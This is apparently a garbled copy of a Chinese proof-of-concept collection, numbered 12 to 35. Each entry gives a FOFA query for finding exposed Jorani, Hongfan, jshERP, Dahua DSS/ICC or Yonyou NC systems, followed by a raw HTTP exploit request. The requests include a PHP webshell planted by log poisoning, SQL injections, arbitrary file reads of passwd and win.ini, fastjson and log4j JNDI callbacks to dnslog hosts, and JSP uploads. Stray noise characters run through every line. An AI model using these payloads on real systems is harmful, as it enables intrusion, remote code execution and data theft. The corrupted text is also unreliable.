7 `5 t5 P+ E( t) CPragma: no-cache$ g4 u! u$ [; p- \/ Z
Cache-Control: no-cache. k6 t% O J6 [" {
Upgrade-Insecure-Requests: 1" D# ^* ^3 \. l# D4 `, T8 O1 f$ h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
1 n& t: v! r3 {2 E! s1 E& NAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.75 T: j/ e0 g9 ?- a( r4 J, ~5 ~, t9 O
Accept-Encoding: gzip, deflate
% g+ {1 y: P3 g9 v0 VAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
3 y) t! O2 M6 i$ d- @/ K' {Connection: close5 ^; i( [6 H/ [! j+ ^/ H
+ N9 r& l0 @1 p
: c2 }: ^6 r8 ?; _12. Jorani < 1.0.2 远程命令执行( @. ]4 { j) L% o- ?, d, m9 y
FOFA:title="Jorani" a' n6 J4 w" m7 |" h. l; i
第一步先拿到cookie; b/ ~6 e( s1 v8 l c( q
GET /session/login HTTP/1.1
$ P$ ^: J6 b2 q C" }7 r2 LHost: 192.168.190.30
7 F6 b- Y. b. PUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
5 d! Y0 ~$ u' RConnection: close
" Y% ?$ ^; {0 \+ b# E$ \Accept-Encoding: gzip
; w7 n' a" {, W
D- O# K! [9 K9 ?3 o5 H
, j0 \" H3 O4 L9 y响应中csrf_cookie_jorani用于后续请求
# k! a; Y- t9 Z9 B8 n# f$ D9 ^HTTP/1.1 200 OK
6 B' L% U/ F5 uConnection: close
) U- N' O: r/ z: |4 c% ]. u q) c3 qCache-Control: no-store, no-cache, must-revalidate
3 p2 c j0 E: l. G' v' DContent-Type: text/html; charset=UTF-8
0 [' k6 R$ @9 N5 z. u+ l0 n- v$ v1 IDate: Tue, 24 Oct 2023 09:34:28 GMT
' D1 e! i! b) G7 jExpires: Thu, 19 Nov 1981 08:52:00 GMT
' {7 V( l# S5 i8 A" pLast-Modified: Tue, 24 Oct 2023 09:34:28 GMT! H- }9 S' R) `! \0 t
Pragma: no-cache
0 g# e# q3 y# u6 A n1 OServer: Apache/2.4.54 (Debian): @7 H K- [. }# D9 }7 e5 G! b
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
$ u. M. ^, b( D( e9 jSet-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly8 Y2 z$ a" }( R# S
Vary: Accept-Encoding: K, }9 t* k6 d% D$ X! T
& ^ Q) C0 T* n- P$ Q$ [* C
( ?) K' i2 Q# m: SPOST请求,执行函数并进行base64编码) H2 I# W, P0 g1 k* l6 V
POST /session/login HTTP/1.1/ i" A4 {0 }) P9 R0 U2 @
Host: 192.168.190.30
) e3 \/ x5 @' e. Z5 SUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
- J& Y. q# S, g' W; g& DConnection: close
* W1 n5 _) q. ^Content-Length: 252
1 H, k, y4 M# d# Z/ ?6 NContent-Type: application/x-www-form-urlencoded6 }& I+ C/ `8 N& A9 i7 ]# W
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r4 ^$ V: R4 u% V7 N$ P2 P
Accept-Encoding: gzip
* h% S9 R( E, e1 `5 g) X8 ?0 r$ w3 m: `
csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor* c" s6 K2 Q5 }% r; j2 H' G
$ K) N) W( i M9 O2 L
9 Q& z5 q! X) b2 |; d! o k5 b0 n) M5 B/ A0 p
向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串
7 f: E+ X! B4 ]. oGET /pages/view/log-2023-10-24 HTTP/1.1
" x" l, L, W# r1 B* P6 LHost: 192.168.190.30
, t \4 C/ i; M+ S8 @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
0 m9 W7 ^7 M* xConnection: close
% ]& C" F% d2 o5 [- g! y) U1 DCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r/ ^% E( e. i, f( C) a- b
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
0 U8 `' o0 x" l9 C; i' R3 E) T) h6 \X-REQUESTED-WITH: XMLHttpRequest
/ [( d0 t% q( L6 t9 Y2 f/ k9 h8 s' wAccept-Encoding: gzip
, _" Y: U0 L7 Z
5 B+ t/ f7 A3 c2 E& N
& c" _' O d4 O$ |+ L+ i13. 红帆iOffice ioFileDown任意文件读取
$ D# e) x( r3 RFOFA:app="红帆-ioffice"/ s6 M- v9 @* b9 P
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1$ P) b1 [% q/ v7 W. m/ n; r
Host: x.x.x.x
1 t7 ^( J/ O8 n( pUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.367 f9 u3 m7 q. w9 X- `# d/ W
Connection: close
8 n2 X- D/ g4 E. u- x: ]1 ]Accept: */*7 y& ^% g$ K5 u% t' Q, [" G4 D
Accept-Encoding: gzip
8 M D ?! R+ A! R5 n5 u7 b& w
2 F" d" V7 f0 x
0 l' }8 P7 h( u# ^( g! J4 y14. 华夏ERP(jshERP)敏感信息泄露
- c/ I; z+ }$ Y/ a1 R1 [% f! c. ^FOFA:body="jshERP-boot"# _7 ^2 ?" j! S8 y* a) J4 L( v
泄露内容包括用户名密码
; L. M+ G7 P+ H* gGET /jshERP-boot/user/getAllList;.ico HTTP/1.1
' O5 {+ f* p& l% S pHost: x.x.x.x1 e2 A" C$ _- p+ m$ P4 a
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
$ k- l3 Z; p L4 h5 q! }. FConnection: close
; A3 f5 h% P; {: q; }Accept: */* U4 L1 h8 v6 |3 \3 B
Accept-Language: en
9 ]+ P+ B' g! G4 B% t4 a" L5 hAccept-Encoding: gzip
, b y4 a% c3 F% s% X6 J8 ~' x4 [8 m7 G+ N& h
3 R* G: \4 J6 C* U$ b
15. 华夏ERP getAllList信息泄露% B c) S0 W: S, O) J
CVE-2024-0490% q. f, i/ ]% S1 @# S# v4 _* o# n
FOFA:body="jshERP-boot"
- ~7 V5 x% [3 V5 H6 D# P- D$ D+ _6 @泄露内容包括用户名密码
5 m# `& z6 |( b* r, lGET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1- v+ p0 Z! D) r& {; D0 s# k) Z
Host: 192.168.40.130:100
+ S+ |( {3 n, d8 Z6 u* m& b4 v- [9 RUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
' D* W3 C4 d* S8 t# s2 q* X1 RConnection: close6 X( i2 a4 w+ _6 U! |4 Y
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.84 c$ f: V" ?0 t" s! @; w; k
Accept-Language: en
, s- A5 N0 I* L8 j2 Dsec-ch-ua-platform: Windows
% E. p6 d; Q; f# ^Accept-Encoding: gzip
+ d% S# s5 e8 s C+ [; ?* g* k! Q0 Y; H7 \. @, y
* k$ Z6 |# d a* B1 I/ C6 `7 h* r
16. 红帆HFOffice医微云SQL注入4 W( c7 Y D: T) e& S8 \1 Z. K
FOFA:title="HFOffice". J, O( g8 z) P, j2 ~$ m
poc中调用函数计算1234的md5值
( B. W+ |' r4 }7 c3 s( S+ ^8 t9 ZGET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
# |: s+ B; t3 x' E$ h9 NHost: x.x.x.x
. x* J& s) ^1 S% v& v! gUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
8 a0 U, Y4 R, O: i$ k, cConnection: close: J" p8 ]# Z- t
Accept: */*
7 V+ L- g! R. L! m0 p+ O& c) ?' `Accept-Language: en
@8 W" V1 G+ e; ]# PAccept-Encoding: gzip; M% n; o# F" W9 g+ `
+ }" e! k9 ~$ \8 f+ d1 t4 Z1 t! l2 C
+ S/ n( X3 c1 K! Q& r17. 大华 DSS itcBulletin SQL 注入
" D: }, t5 }# a) S5 j5 EFOFA:app="dahua-DSS"
* g$ Q+ a4 q1 C2 K6 APOST /portal/services/itcBulletin?wsdl HTTP/1.1% |, q3 O) d4 d6 g2 i4 k- I
Host: x.x.x.x) m* l! c; W* E
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15( c% `' ^9 m2 X3 J9 d
Connection: close
4 n/ e) S" r1 `+ o8 H4 OContent-Length: 345
" C _0 k8 g' O$ x' j8 J+ j( uAccept-Encoding: gzip9 E U3 v! m r! A
* D) I* N( r, j5 |
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
% U, Q3 \+ x. ~) n<s11:Body>$ Z4 K! n: R) i) J: E
<ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>, p) E: M" R2 _# B% l/ X
<netMarkings># T$ c& f) {8 R" t' W6 R
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=19 J' N+ W) Z# i6 \0 ~- b
</netMarkings> \4 t3 Q6 ]* V- a
</ns1:deleteBulletin>
/ b n) O& h8 v4 x! B( T </s11:Body>
# y0 }& C! ^; R0 {: H' u$ m</s11:Envelope>
5 r3 d# T4 B! f/ M [" {5 x" g! z. F% I4 }5 A% X6 a
( g7 |2 |' t+ K) B5 V$ R0 n18. 大华 DSS 数字监控系统 user_edit.action 信息泄露, A n) P7 {1 C
FOFA:app="dahua-DSS"7 B! R6 I: t. B, P
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1 I, o# i% U9 ^" k) g7 [
Host: your-ip/ _1 k& J+ ?( D4 I! v* C M0 Z2 a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
3 ^: X& A9 D/ r% Z% v- lAccept-Encoding: gzip, deflate; X, F/ P4 T+ ?0 c, v, s: ~* j
Accept: */*7 n' y; ]- p0 f8 U* ?" @% i
Connection: keep-alive+ K6 d3 P. b3 k
2 O( _% m0 m! k! m3 R& ?6 E
& N% Y: y2 A# o+ Y* R" P: C" Q% T
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
3 r2 z( i# A0 X2 E3 X9 x5 oFOFA:app="dahua-DSS"
+ g- ] G1 i# d C' rGET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
& S8 }# ^! X7 @& B1 N( sHost:
" N a C1 x& k. @/ a. q5 qUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.368 y" J ?; b( g7 L! t u
Accept-Encoding: gzip, deflate/ ^% D6 b+ v+ C S' k7 [2 {4 J
Accept: */*
8 v% t/ Q0 D# cConnection: keep-alive
% h2 {* {. ?1 p4 E* m9 N
* }! Z$ B; _. u( E* x
. J- ~6 a. P- u/ Q4 @20. 大华ICC智能物联综合管理平台任意文件读取; T& b) D+ a" ~& }* J9 j, r
FOFA:body="*客户端会小于800*"+ D- F" e# c8 w4 e6 C, u* t
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
) Y3 C4 ?! M! Y* y* ], xHost: x.x.x.x
1 {: ?, l" G" o! E# O1 w4 m. dUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
) E; t9 d, Y* \* I, ZConnection: close- i8 M# ]8 t1 n
Accept: */*
* J1 t i, A7 R( q) CAccept-Language: en. C2 g" A. b2 n+ M) S4 v' P8 x M
Accept-Encoding: gzip& f, { ^/ x: C& {) p% l M
* E4 ]! q( o8 Y$ P
4 i, Y# O0 D2 ]( ?: m/ }21. 大华ICC智能物联综合管理平台random远程代码执行
# |7 Z. f( W, D/ Z9 |( mFOFA:icon_hash="-1935899595"4 U( Z7 p p! G
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1) r# F5 u- F3 U# |$ w
Host: x.x.x.x
0 A! M: I. I( r$ D6 q0 F3 [User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
; {7 h" z/ a% F. z8 `4 GContent-Length: 161
! ]- W& Y& r8 S3 R2 }0 d: K5 \! _Accept-Encoding: gzip; e5 g( G2 ~8 V/ H$ \
Connection: close
/ k, E+ S' p( D* F2 i/ t7 A9 A5 @Content-Type: application/json;charset=utf-8
# z) z1 X/ E! w6 q' S0 \" G
! T$ H4 h' C! K9 G{
! x" ?( ~0 }' c* R% y"a":{
4 x9 `3 c/ u7 ` "@type":"com.alibaba.fastjson.JSONObject",
/ I' z% G) Y; o p6 |$ W5 Q {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}" S0 f7 p! ~# x9 \3 J* [
}""
' T2 @" P& z) ^, z6 @% L) K4 z}
4 I/ b. S* w7 d( G4 S' ^
' J) S" l; _+ d' z! Q" h4 V, W. z4 e8 g" }& V+ J
22. 大华ICC智能物联综合管理平台 log4j远程代码执行8 b: O7 T6 @+ r8 b7 s
FOFA:icon_hash="-1935899595"
' W6 e. h) ~( t! p( Y5 [POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1/ w$ E6 d# l3 Q2 n& }
Host: your-ip
0 d" g7 ~/ n6 v5 AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
0 c) C( P5 e. C( T& A5 s. UContent-Type: application/json;charset=utf-8
4 l+ s3 B' n% n" s$ U
! w5 v& V3 ~! g7 V* j0 U, C{. `6 [* K% ~% P/ Z9 {" V( k/ z D H- [
"loginName":"${jndi:ldap://dnslog}": R% i# d* y7 M6 M) w1 {" e
}
. a( g; X# @7 |+ N. m
. x% E9 Z' b; J) ]# p
7 r# j9 j( j3 Z/ F2 {% e0 X* O* a
7 I ]$ _3 X* j i6 f23. 大华ICC智能物联综合管理平台 fastjson远程代码执行% g/ W8 |+ a1 m& ^9 C2 D5 k. {
FOFA:icon_hash="-1935899595"
/ l3 Y6 s0 n2 `7 h$ UPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
' O3 P {- L% l u1 V- qHost: your-ip
0 C0 {0 x7 S, P' P ^1 NUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
1 V* o# B' H+ F4 |Content-Type: application/json;charset=utf-8
! H8 W/ o% ^- N) H# mAccept-Encoding: gzip
9 l6 _; _: Z' U x( pConnection: close
# ]! \# f' Z* `* K" r9 C" K
! ^, H3 G$ v1 H! v" U. Y{# D/ p1 o% [3 c8 m; g
"a":{3 a0 z4 r- ]: L5 ^$ q3 ~
"@type":"com.alibaba.fastjson.JSONObject",
! E6 F0 c% T0 i) h3 R1 \ {"@type":"java.net.URL","val":"http://DNSLOG"}
# K" F' g4 Z- v/ g6 M* K7 f. j }""
( I6 K$ ]$ p& t; U3 u0 H}
# T/ l$ B9 `0 |' w
0 ]8 }3 i. H! O, `2 v2 H7 s' I: F* i6 v v1 k4 L) Y1 B
24. 用友NC 6.5 accept.jsp任意文件上传; U# y, u9 d1 G3 ~5 |
FOFA:icon_hash="1085941792"8 z" n( j6 i+ t+ e
POST /aim/equipmap/accept.jsp HTTP/1.13 O+ a5 k" b8 h/ {! @' H
Host: x.x.x.x
9 P9 a$ ?! o% O8 oUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.366 t, K/ @& ^8 O3 R3 [9 q! \: ^
Connection: close
; ?" `, S; K; B! C. ?6 k& QContent-Length: 449
; v4 t& f8 C0 r$ j. ~Accept: */*4 R$ t: ~) a$ O
Accept-Encoding: gzip
! V. G* I- D" s2 X$ S2 B8 E3 p* fContent-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
% Y8 r3 f+ R- @; @0 } v5 S/ O8 X
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc# O8 }2 ?7 t2 W& ]: @
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
K" ?- ~& ]$ b5 D0 ^9 }+ p$ BContent-Type: text/plain
. m' \3 g9 p9 Z. N' a
# f. ], l, F% F2 v5 \2 Q<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
( D- e: I8 {( \/ h2 Z-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc! w0 I4 m1 u' t" }# O L' s
Content-Disposition: form-data; name="fname"/ o+ j; a5 K3 P& Z
0 I" [1 U# l: V4 B# p
\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp3 t- u* w7 X; x% `, w2 I# c
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--
2 u/ s8 }+ _; M ` K$ j. Q; }
% {( |' ?; b) T) m! R
' S% l1 L V, M% Q25. 用友NC registerServlet JNDI 远程代码执行/ r u8 F) B+ w" [
FOFA:app="用友-UFIDA-NC"# G. Z" L1 ~2 m$ k9 m
POST /portal/registerServlet HTTP/1.1+ Q h" D' |# ~% _$ H- z7 [
Host: your-ip
8 f; T. t4 Y2 U5 ]7 n. x6 [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0; L: v' `" |3 c4 a2 `2 Q+ `
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
, Y) \ ~ d7 r# b. U F. _8 z* ?Accept-Encoding: gzip, deflate
2 b& x( P9 g" D" b. _; V$ x1 q- ]Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6+ T! K/ T# v3 R, P6 |. |0 \; C
Content-Type: application/x-www-form-urlencoded' F) ]# h8 d4 @& h/ e; {
* x1 ~# J, i2 i: v" \$ ntype=1&dsname=ldap://dnslog
6 a/ e# U( p: t; I" _8 N k7 F
+ d+ Y0 U. ?# s; S% ]5 c( x' K- \6 n3 R+ {, k
" `0 r4 y" \" f' h# q/ c' q/ ^26. 用友NC linkVoucher SQL注入
+ e C9 h* g# [FOFA:app="用友-UFIDA-NC", P; j* p4 \3 U( B
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1/ x4 L% }' [: C" O b
Host: your-ip/ ?' ~2 w. _; b3 W7 ]3 l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
6 h; c4 ]5 h8 R( tContent-Type: application/x-www-form-urlencoded
. E& P0 o1 p. e, Z5 j/ L zAccept-Encoding: gzip, deflate
e6 Z9 Q9 w% A* A$ B5 D) E+ `) `6 OAccept: */*
0 { b- j' ~1 sConnection: keep-alive
3 @% l+ [ b* I4 s. d! o' ^
0 J% `# ?! v" G* e) C
4 R& c- j' N9 c9 i8 l/ o27. 用友 NC showcontent SQL注入
2 A5 V. q4 g# h2 t9 T; ZFOFA:icon_hash="1085941792"- u, @9 c; L3 d& b' A8 c$ W
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
% F! N u9 U: [% M. _: b4 D8 D3 CHost: your-ip
q+ d+ @% o. v, R. B: F& h: yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
, s/ m; i2 A; o2 M* @Accept-Encoding: identity
* ~9 s3 x" ^3 f( h6 N9 YConnection: close
8 m8 q! Q, j! P5 OContent-Type: text/xml; charset=utf-8
. L7 j$ O$ P- j# m: z4 }$ _' l7 b
: A6 t* t4 T2 {! D, X! }28. 用友NC grouptemplet 任意文件上传8 W# C; W- T, I! _& {# T5 P' N. f
FOFA:icon_hash="1085941792"
8 u* i+ M" p1 N/ j% b* q- \& e. NPOST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
6 F2 A: k8 t, x+ e1 s/ zHost: x.x.x.x
. A; @% J- X7 C# AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36) b c& ]/ o! A$ S
Connection: close/ d/ c' A) _. h% m/ o/ `5 E
Content-Length: 268( Y# q& ?, y+ N; \+ @: t( z6 c& Y
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
+ l/ V: ?3 w: Y$ [0 u5 wAccept-Encoding: gzip, Y" U) |1 ?$ s& B; d
- }# r1 [# \: K- ^9 A9 e------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk+ ]) V5 M2 Y) K
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp". r- B: _; r) H, o3 z, q
Content-Type: application/octet-stream5 P& q" |/ E& m, }8 {
( s. ^- ?# S3 ^0 L0 l<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>4 V4 S( Z/ ?9 Z
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--
# h2 I+ z7 E' F7 u, y) d& w6 z1 e6 k
$ A$ x4 m4 o& B2 Y9 n5 H
/uapim/static/pages/nc/head.jsp
- s4 l% \% H. e' v8 @" G5 ~; ]7 B6 R4 w6 I6 z$ ?
29. 用友NC down/bill SQL注入2 h. Q9 X) ^4 |, |5 l' y& u2 Y
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
C* T6 P* X& o, D) V/ LGET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1) g& k8 \1 n- y& w. z
Host: your-ip* F" {/ M3 i, J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36# @- J/ G' j/ Y. w% y
Content-Type: application/x-www-form-urlencoded" ~) {( ]+ L8 J/ G
Accept-Encoding: gzip, deflate2 V9 h( x' Z) F. g* k) {3 R# A% h0 y
Accept: */*
# ~: Y1 Z: a, p& IConnection: keep-alive0 Z/ F5 M4 u u0 u7 I- t9 z/ N C
9 N% K' R; l2 u
$ Q( M) G- O7 H- v( P! @30. 用友NC importPml SQL注入+ h0 p" I7 n! r- z9 l A5 A
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
, @2 m6 a* X# ^$ wPOST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
$ z0 |/ U. Z( g; B- X* vHost: your-ip
: V) q( Q3 z) z3 J) e; YContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
( f2 Z* Z+ f0 m& g* r, WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.368 J2 J5 r" D, o* K1 { @, S
Connection: close4 U' w% D2 F$ \# e! V( r* Y' m
4 ^# Y4 h6 l/ ]
------WebKitFormBoundaryH970hbttBhoCyj9V" \8 e0 D& J P8 R( r: [
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"* d1 x4 v4 r8 l6 V
Content-Type: image/jpeg
' R4 g: p* Y5 i# F7 g8 q# U; P/ X X------WebKitFormBoundaryH970hbttBhoCyj9V--& J0 f4 S4 Q3 M7 z3 n1 D
, L' A3 ?8 c6 F x2 q
3 U$ d; X. Z1 H4 Z31. 用友NC runStateServlet SQL注入
# u. L4 L( O/ S( C8 @0 u9 [version<=6.5
' ^5 F/ u( K3 k. \FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif": r0 z4 J% I( y
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.16 L/ A y" C# O) a, h' Y1 Z* H
Host: host5 ~& }" U4 ]9 d7 C
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36: h" w! z7 ~4 \/ `: q
Content-Type: application/x-www-form-urlencoded
" G8 }/ {+ L: X! r: L: Z9 P
, N6 q0 |* I" ^; D1 t( i8 U. d+ `; |8 _; o, P6 _. U4 A" u: N" V
32. 用友NC complainbilldetail SQL注入
" c9 g1 ^, t3 u& Y+ P8 D) I- Xversion= NC633、NC65
0 g' x+ L H% |6 L& n( }FOFA:app="用友-UFIDA-NC"8 _* v$ @# Y% `0 e6 Z) Z9 T
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1$ a& p2 C, y! W" C
Host: your-ip+ U7 z" y: I3 O% B V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
6 \( _1 H( U( PContent-Type: application/x-www-form-urlencoded( j0 Q7 f% \6 H+ r! u
Accept-Encoding: gzip, deflate" t/ f9 m* {: l8 t/ e/ q; ]
Accept: */*
$ \5 d2 j2 ?4 CConnection: keep-alive. v+ K L: G" O! v) d' _
, ^8 l) F1 y1 r8 M8 i1 V7 w
+ ]& G% `5 n* T: j; h7 O7 P, ?
33. 用友NC downTax/download SQL注入
! Q; ^; A3 E% f3 B( G8 H8 b" rversion:NC6.5FOFA:app="用友-UFIDA-NC"& @- ^! H, J2 a& ?
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
2 c. [6 c7 u7 sHost: your-ip6 L- R; [3 F9 {5 q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
6 G3 a6 t: H- @5 OContent-Type: application/x-www-form-urlencoded2 x' d; e! b1 c4 ^) P
Accept-Encoding: gzip, deflate
/ m& \# O8 W3 E' g: \# mAccept: */*" e! A6 |( z9 u2 Q8 l; P
Connection: keep-alive2 o0 V# j; p6 Z9 k, o
( }* Q0 ~3 F! u1 I
/ O7 W+ N" i' y8 X$ \) j34. 用友NC warningDetailInfo接口SQL注入
4 K2 N5 T' y5 r; v* XFOFA:app="用友-UFIDA-NC"3 S$ O, B7 \- T
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1( S7 a9 s9 i3 k% I
Host: your-ip- W& [" ?2 t1 |, u! b. n5 w5 r% V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
8 ^- D% k6 o6 AContent-Type: application/x-www-form-urlencoded$ X; o( T t& @8 a
Accept-Encoding: gzip, deflate. _1 Q: h8 Z0 p: w/ s# v# N' b3 q* ?
Accept: */*, j( Z( x2 S+ u( e3 s7 s5 L
Connection: keep-alive
$ ]( Z) x J% t; T0 q% v4 w: K) h/ X7 q/ D4 j# P
4 r) J7 U: V" O2 G7 {( U) e35. 用友NC-Cloud importhttpscer任意文件上传
4 T6 F+ h" r( J( oFOFA:app="用友-NC-Cloud"/ c0 g8 r; b9 I% c$ n
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1) A. O& Y" G, r, w& P
